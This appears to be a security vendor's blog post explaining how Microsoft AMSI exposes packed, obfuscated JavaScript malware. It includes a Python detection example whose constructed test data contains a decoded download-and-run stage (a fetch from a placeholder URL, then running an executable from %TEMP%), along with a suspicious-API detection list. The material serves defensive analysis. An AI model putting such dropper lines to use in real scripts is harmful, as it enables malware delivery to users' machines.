Tuesday, February 5, 2019

Generic Unpacking of Javascript with Microsoft AMSI

Malicious Javascript files dominate the ranking of malicious e-mail attachments for the year 2018 with 37.2%. Why is that? Due to the flexibility of the Javascript language as well as its various dynamic code execution functions, packing and encryption are easy to achieve. As a result, detection of malicious Javascript files is extremely difficult. Below is an example of a recent malicious Javascript file:

Wouldn't it be nice to get the unpacked and deobfuscated Javascript code? This would help to detect malicious Javascript and also reveal additional behavior indicators.

Security engineers have proposed using Javascript emulators. The emulator runs the file and outputs various internal states such as parameters and string values. This works great in theory, but not in the real world. Malware authors quickly adapted and added code to detect the emulator. Below is an example of a sample which verifies the number of processors:

We, therefore, thought there must be a better way. Enter the Microsoft Antimalware Scan Interface (AMSI).

AMSI in a Nutshell

AMSI is a generic interface standard that allows applications and services to integrate with any anti-malware product present on a machine. It basically lets an application hook into a Windows interface that Windows Defender also uses. Here is an image from the Microsoft Cloud Blog outlining how AMSI works with Microsoft Office.


Behavior logs are mostly string buffers of executed code. In addition to Microsoft Office, AMSI also provides buffers for

  • Wscript.exe, VBA Code
  • Cscript.exe, Javascript Code
  • Powershell.exe, PS1 Code

Here is an example AMSI output for a Javascript file:

Here another one:

AMSI does not care about packing, unpacking or obfuscation. It sends all executed code as strings to the interface. As a result, AMSI is the perfect unpacker and deobfuscator. Malware cannot use AMSI as an indicator for evasion, since AMSI runs on real targets as part of Windows Defender. Approaches to disable or evade AMSI can be detected and serve as an additional malicious indicator.

Detecting Packed Javascript Files with AMSI

With the AMSI output, one can also easily detect packed Javascript files. The approach is straightforward:

Given a potentially malicious Javascript file, we check whether it contains suspicious strings such as IWshShell3.Run or IServerXMLHTTPRequest2.open. If we find one or a combination of such strings, the sample is considered malicious. If we do not find such strings, we check each AMSI buffer for the same strings. Please note that AMSI sends all executed code, including the code passed to the eval function. If a string turns up in an AMSI buffer, we know for sure that the sample is both malicious and packed. If we do not find any string, the sample is considered clean.
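The two-stage check above, written out as a small classifier (an added example, not Joe Sandbox's own signature code). The AMSI buffers are constructed by hand to stand in for what a script host hands to an AMSI provider while running a sample: the file text itself, followed by the decoded text passed to eval. The suspicious-string list, the sample scripts and the URL are assumptions made up for illustration.

```python
"""Added example: the post's raw-text-then-AMSI-buffer detection algorithm.

Stage 1 searches the script file for suspicious API strings. Stage 2 repeats
the search over the AMSI buffers recorded while the sample ran; because the
script host submits every piece of executed code, including eval() arguments,
a packed sample exposes its payload there. Everything below is constructed
test data, not real AMSI output.
"""
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Strings the post names as suspicious (assumed list for this example).
SUSPICIOUS_STRINGS = ("IWshShell3.Run", "IServerXMLHTTPRequest2.open")


@dataclass(frozen=True)
class Verdict:
    malicious: bool
    packed: bool          # True when the hit appeared only at run time
    hits: Tuple[Tuple[str, str], ...]  # (suspicious string, where it was found)


def find_hits(text: str, where: str) -> Tuple[Tuple[str, str], ...]:
    """Return every suspicious string present in text (case-insensitive)."""
    lowered = text.lower()
    return tuple((s, where) for s in SUSPICIOUS_STRINGS if s.lower() in lowered)


def classify(raw_script: str, amsi_buffers: Iterable[str]) -> Verdict:
    """Stage 1: the file itself; stage 2: each AMSI buffer in order."""
    static_hits = find_hits(raw_script, "file")
    if static_hits:
        return Verdict(malicious=True, packed=False, hits=static_hits)
    for index, buf in enumerate(amsi_buffers):
        hits = find_hits(buf, f"amsi buffer {index}")
        if hits:
            # Visible only after execution: the sample hid it behind packing.
            return Verdict(malicious=True, packed=True, hits=hits)
    return Verdict(malicious=False, packed=False, hits=())


def reveal_unpacked(raw_script: str, amsi_buffers: Iterable[str]) -> List[str]:
    """Return the AMSI buffers that do not occur verbatim in the file.

    These are the decoded stages a report can show as 'unpacked code'.
    """
    return [buf for buf in amsi_buffers if buf not in raw_script]


# Constructed packed sample: the file only decodes a byte array and evals it,
# so no API name is visible to a static string search.
PACKED_SAMPLE = (
    "var c = [0x31, 0x2e, 0x5a]; var k = 0x2a; var s = '';\n"
    "for (var i = 0; i < c.length; i++) s += String.fromCharCode(c[i] ^ k);\n"
    "eval(s);\n"
)

# Constructed stand-in for the AMSI buffers delivered while running it: the
# file contents first, then the decoded text handed to eval(). The URL is a
# placeholder (.invalid is reserved and never resolves).
PACKED_AMSI_BUFFERS = [
    PACKED_SAMPLE,
    'IServerXMLHTTPRequest2.open("GET", "http://example.invalid/x", false);\n'
    'IWshShell3.Run("%TEMP%\\\\x.exe", 0, false);\n',
]

# Constructed sample that is malicious without any packing.
PLAIN_SAMPLE = 'var sh = WScript.CreateObject("WScript.Shell"); IWshShell3.Run("calc");\n'

# Constructed benign sample: AMSI sees only the same text that is in the file.
CLEAN_SAMPLE = 'WScript.Echo("hello from a login script");\n'


if __name__ == "__main__":
    print(classify(PACKED_SAMPLE, PACKED_AMSI_BUFFERS))
    print(reveal_unpacked(PACKED_SAMPLE, PACKED_AMSI_BUFFERS))
    print(classify(PLAIN_SAMPLE, [PLAIN_SAMPLE]))
    print(classify(CLEAN_SAMPLE, [CLEAN_SAMPLE]))
```

The order matters: a hit in the file alone yields "malicious" but not "packed", whereas a hit that shows up for the first time in an AMSI buffer proves both, which is the extra signal the post's signature reports.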

We have added the above algorithm to Joe Sandbox v25 Tiger's Eye, which is planned for mid-February. Below you find an example signature hit of unpacking detection for the Javascript sample shown in the introduction.

Joe Sandbox has detected the unpacking and displays the full unpacked code. Here, the script's function is to download a binary and then execute it.

You find the full analysis report here.

Final Words

37% of all malicious e-mail attachments are Javascript files. Javascript makes it easy to pack and obfuscate code. As a result, Javascript files often slip through today's detection engines such as antivirus and endpoint protection. The Microsoft Antimalware Scan Interface is an ideal tool to unpack and deobfuscate malicious Javascript.

Joe Sandbox v25 Tiger's Eye includes an implementation of the AMSI interface and detects and unpacks Javascript files.